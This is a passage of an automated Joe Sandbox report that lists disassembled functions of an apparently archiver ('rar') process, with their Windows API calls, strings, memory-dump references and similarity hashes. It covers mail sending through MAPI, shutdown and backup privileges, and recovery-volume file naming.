FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1B244
FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1B287

Strings

SMTP:, xrefs: 00007FF695D1B069
MAPI32.DLL, xrefs: 00007FF695D1AEC2
MAPISendMail, xrefs: 00007FF695D1AEDF
MAPIResolveName, xrefs: 00007FF695D1AEF7
MAPIFreeBuffer, xrefs: 00007FF695D1AF0F

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
API String ID: 3483800833-4165214152
Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
Instruction ID: d0211444c3835945089ed9e9beb1d9f77b3dc5f19f670def1eef39f48f084c56
Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
Instruction Fuzzy Hash: 5CC17D22A09A8289FB24DF21E8502BD27E0FF44F98F446275DA4E8B795DF3CD949C744

Function 00007FF695D1B57C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF695D1B593
OpenProcessToken.ADVAPI32 ref: 00007FF695D1B5A6
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF695D1B5BE
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF695D1B5EF
ExitWindowsEx.USER32 ref: 00007FF695D1B602
ExitWindowsEx.USER32 ref: 00007FF695D1B637

Strings

SeShutdownPrivilege, xrefs: 00007FF695D1B5B7

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3729174658-3733053543
Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
Instruction ID: ab28e30d25a1424952482c7f089d3fa8e0775b40b898d9b10e99fbcbb6ee645f
Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
Instruction Fuzzy Hash: 8621D531A1860282F7B4CF20E45537A73E1EB94F04F506175D94E8B598DF3DD88E8748

Function 00007FF695CEE21C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF695CD2014), ref: 00007FF695CEE298
FindClose.KERNEL32(?,?,?,00000001,?,00007FF695CD2014), ref: 00007FF695CEE2AB
CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF695CD2014), ref: 00007FF695CEE2F7

Part of subcall function 00007FF695CEEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF695CEEE47), ref: 00007FF695CEEF73
Part of subcall function 00007FF695CEEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF695CEEE47), ref: 00007FF695CEEF84
Part of subcall function 00007FF695CEEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF695CEEFA7
Part of subcall function 00007FF695CEEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF695CEEFCA
Part of subcall function 00007FF695CEEF50: GetLastError.KERNEL32 ref: 00007FF695CEEFD4
Part of subcall function 00007FF695CEEF50: CloseHandle.KERNEL32 ref: 00007FF695CEEFE7

DeviceIoControl.KERNEL32 ref: 00007FF695CEE357
CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF695CD2014), ref: 00007FF695CEE362

Strings

SeBackupPrivilege, xrefs: 00007FF695CEE27E

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
String ID: SeBackupPrivilege
API String ID: 3094086963-2429070247
Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
Instruction ID: 97253886bcb41b844539ea96ec36089d2d8f13dc13240bc43e0df370dd00255f
Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
Instruction Fuzzy Hash: 14618C32A0868286E7349F61E4452B933E0FB44B98F405279DB6E97AD4DF3CED49C704

Function 00007FF695D0AF0C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 427COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF695D0AFA0

Part of subcall function 00007FF695D1B6D0: Sleep.KERNEL32(?,?,?,?,00007FF695CECBED,?,00000000,?,00007FF695D17A8C), ref: 00007FF695D1B730

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695D0B185
new.LIBCMT ref: 00007FF695D0B18F

Strings

, xrefs: 00007FF695D0B2B6
%ls%0*u.rev, xrefs: 00007FF695D0B170

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Sleepswprintf
String ID: $%ls%0*u.rev
API String ID: 407366315-3491873314
Opcode ID: c9f3de61729852c76deda6d3bc53b2966b68ce423666986f381f2cda437ab536
Instruction ID: 1c50be6d04889db5a2f1685dfe9b1d0d10b6d9f7add6d66f692b122c1874446b
Opcode Fuzzy Hash: c9f3de61729852c76deda6d3bc53b2966b68ce423666986f381f2cda437ab536
Instruction Fuzzy Hash: F202F532A0868286EB30DF25E4446AD77E5FB88F84F411276DE5D8B799DE3CE849C704

Function 00007FF695CD49B8 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF695CD4BD8

Part of subcall function 00007FF695D1B6D0: Sleep.KERNEL32(?,?,?,?,00007FF695CECBED,?,00000000,?,00007FF695D17A8C), ref: 00007FF695D1B730

Part of subcall function 00007FF695CF1E80: CreateFileW.KERNELBASE ref: 00007FF695CF1F4A
Part of subcall function 00007FF695CF1E80: GetLastError.KERNEL32 ref: 00007FF695CF1F59
Part of subcall function 00007FF695CF1E80: CreateFileW.KERNELBASE ref: 00007FF695CF1F99
Part of subcall function 00007FF695CF1E80: GetLastError.KERNEL32 ref: 00007FF695CF1FA2
Part of subcall function 00007FF695CF1E80: SetFileTime.KERNEL32 ref: 00007FF695CF1FF1

Strings

%s, xrefs: 00007FF695CD4EAF
%12s %s, xrefs: 00007FF695CD4E8E
%12s %s, xrefs: 00007FF695CD4E58
, xrefs: 00007FF695CD4F01

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: File$CreateErrorLast$SleepTime
String ID: %12s %s$%12s %s$ $%s
API String ID: 2965465231-221484280
Opcode ID: b199f656fb998f4aed2fd933245750af83dd83ab7653c891da19bc8afc849106
Instruction ID: 1ad92a32f4fe1c39db6964e254bb2fbfc5fa115af2b0c55ebe903cee440c9a42
Opcode Fuzzy Hash: b199f656fb998f4aed2fd933245750af83dd83ab7653c891da19bc8afc849106
Instruction Fuzzy Hash: D6F17922B09A8696EB30DB12E0802BE63A1FB85F84F44057ADB4DC7795DFBCE955C700

Function 00007FF695D34C10 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF695D34C89
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF695D34CA1
RtlVirtualUnwind.KERNEL32 ref: 00007FF695D34CDC
IsDebuggerPresent.KERNEL32 ref: 00007FF695D34D15
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF695D34D1F
UnhandledExceptionFilter.KERNEL32 ref: 00007FF695D34D2A

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
Instruction ID: 9bf1496ffac0db2c0a96d59c83cf1abfb229e142c61b9e2a373f508d2bbb15ac
Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
Instruction Fuzzy Hash: 2F317132608B8186DB70CF24E8442AE37A0FB84B58F501235EA8D87B99DF3CC949CB04

Function 00007FF695CEEF50 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF695CEEE47), ref: 00007FF695CEEF73
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF695CEEE47), ref: 00007FF695CEEF84
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF695CEEFA7
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF695CEEFCA
GetLastError.KERNEL32 ref: 00007FF695CEEFD4
CloseHandle.KERNEL32 ref: 00007FF695CEEFE7

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3398352648-0
Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
Instruction ID: e19141b9aaa571153fb49d42c091563ec8404a4da38641032627507d05835ad0
Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
Instruction Fuzzy Hash: 01116032618B4182E7608F21E44057A77F0FB88F90F445135EA8E87668DF3CD849CB84

Function 00007FF695CD42E0 Relevance: 6.3, APIs: 4, Instructions: 344COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF695CD72C4: new.LIBCMT ref: 00007FF695CD73DE

Part of subcall function 00007FF695CD8010: SetLastError.KERNEL32 ref: 00007FF695CD803D

new.LIBCMT ref: 00007FF695CD448C
new.LIBCMT ref: 00007FF695CD44C5
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF695CD4573
_CxxThrowException.LIBVCRUNTIME ref: 00007FF695CD4584

Part of subcall function 00007FF695CECA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF695CECEDE

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
String ID:
API String ID: 3116915952-0
Opcode ID: eaab0fd040a4371224447bd4a61fc97a754661c77a8ad9fdefb0a511b6022e5f
Instruction ID: b297422d1c3c08b7add21220dff734ca154d6b13b0aef06fda26f4a59152adcc
Opcode Fuzzy Hash: eaab0fd040a4371224447bd4a61fc97a754661c77a8ad9fdefb0a511b6022e5f
Instruction Fuzzy Hash: 22E16D23A48A82D2EB30EB25D4905F923F1FB85B84F4550B6DE4DCB796DE78E905C700

Function 00007FF695CD8884 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 324COMMON

Download Yara Rule

Strings

CMT, xrefs: 00007FF695CD8D2A

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID:
String ID: CMT
API String ID: 0-2756464174
Opcode ID: cbae23b477236efd5552a84d69818ed097b452cbaf440f48f7b5ba52d2a69677
Instruction ID: 6a4a9a3ceb76e740ff5e72941b56cedcab19ad97349cfa1692f442ff53a625a6
Opcode Fuzzy Hash: cbae23b477236efd5552a84d69818ed097b452cbaf440f48f7b5ba52d2a69677
Instruction Fuzzy Hash: 8FD1BC63A18A82D1EA30EB22D4501BD63F0FB85F80F4555BADA9ED76D6DE3CE945C300

Function 00007FF695D386D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF695D38704

Part of subcall function 00007FF695D34E3C: GetCurrentProcess.KERNEL32(00007FF695D39CC5), ref: 00007FF695D34E69

Strings

., xrefs: 00007FF695D38B24
*?, xrefs: 00007FF695D3872B

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CurrentProcess_invalid_parameter_noinfo
String ID: *?$.
API String ID: 2518042432-3972193922
Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
Instruction ID: f9ece348bda7b159cbebe7936d77466759e9b32dcf38a5a25c97d25ce04dea9e
Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
Instruction Fuzzy Hash: 2051F062F16A9685EF20CFA2A8004A867E5FB48FDCB445631DE0D97B85DE3CD9498308

Function 00007FF695D1B340 Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF695D1B39A
CheckTokenMembership.ADVAPI32 ref: 00007FF695D1B3B1
FreeSid.ADVAPI32 ref: 00007FF695D1B3C2

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
Instruction ID: 8f394d1f7edbe6b5c5a5035e978fda5b337dcf0d4e0e98672d2e50d483860797
Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
Instruction Fuzzy Hash: 9A114C72B146018EEB208FB5E4912AE77B0FB48B48F40563ADA8D97B58DF3CC548CB44

Function 00007FF695CECAFC Relevance: 3.0, APIs: 2, Instructions: 27windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF695CECDE2), ref: 00007FF695CECB11
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,00007FF695CECDE2), ref: 00007FF695CECB3B

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
Instruction ID: 817a0457266a3657c127fa63e76a11e2aab63c4f22da8702702df9965a120884
Opcode Fuzzy Hash: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
Instruction Fuzzy Hash: 2CF0893270C791C3E3208F16B44412AA7E4FB85FD4F048174EA8997B58DF7CC9558704

Function 00007FF695CF3144 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

